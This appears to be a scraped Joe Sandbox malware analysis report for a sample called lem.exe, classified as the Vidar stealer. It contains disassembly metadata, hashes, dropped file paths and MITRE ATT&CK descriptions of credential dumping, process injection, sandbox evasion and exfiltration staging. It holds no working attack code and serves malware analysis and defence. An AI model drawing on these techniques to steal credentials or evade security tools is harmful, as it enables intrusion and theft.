Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: d0968bfc31bd41c693637c1f805281795e22e5be2ee7525d7e2bf213ae424393
Instruction ID: 5d12990c0cd2989a5e95a3f5adb3ba09d60bb2e76f0bdf453c6d8926ab657c29
Opcode Fuzzy Hash: d0968bfc31bd41c693637c1f805281795e22e5be2ee7525d7e2bf213ae424393
Instruction Fuzzy Hash: 57D022353AA300B7E338B370ED0FFD2BB109F80B20F1008207309AA1C0D8E06801C760

Function 009B2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009B2E08
PostMessageW.USER32(00000000), ref: 009B2E0F

Part of subcall function 0098F292: Sleep.KERNEL32 ref: 0098F30A

Strings

Shell_TrayWnd, xrefs: 009B2E01

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 009b7df38e39111794a042739dbe908f3ccd8e2fbe3fe37c21926781393b4735
Instruction ID: f55bbf4c40ed8114d0b7afcdf066a074576b5bb6d67335e5d429f886c2a03194
Opcode Fuzzy Hash: 009b7df38e39111794a042739dbe908f3ccd8e2fbe3fe37c21926781393b4735
Instruction Fuzzy Hash: F1D0A93139A300BBE228B370AD0FFC2AB109B84B20F1008207205AA1C0D8E06801C664

Function 0095C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0095C213
GetLastError.KERNEL32 ref: 0095C221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0095C27C

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: b35219309177e5309c2b630d24054760e8a9829671eed64e8c85ac434967c166
Instruction ID: a0d5439ac84d3f632566353fb32635232422bed1470f66e08b92de5a6d247df1
Opcode Fuzzy Hash: b35219309177e5309c2b630d24054760e8a9829671eed64e8c85ac434967c166
Instruction Fuzzy Hash: 9E41E8B0604706EFDB21CFE6C844BBA7BA9AF51722F254169FC65A71A1DB30CD05C760

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lem.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\2N7Y58YCJW47\0ZC2DB

C:\ProgramData\2N7Y58YCJW47\3ECTJM

C:\ProgramData\2N7Y58YCJW47\47YMOH

C:\ProgramData\2N7Y58YCJW47\4E37Q1

C:\ProgramData\2N7Y58YCJW47\4WTRQI

C:\ProgramData\2N7Y58YCJW47\6FUKNY

C:\ProgramData\2N7Y58YCJW47\8Q9RQQ

C:\ProgramData\2N7Y58YCJW47\A1N7QI

C:\ProgramData\2N7Y58YCJW47\BA1VAI

C:\ProgramData\2N7Y58YCJW47\EC2DJW

Windows Analysis Report
lem.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre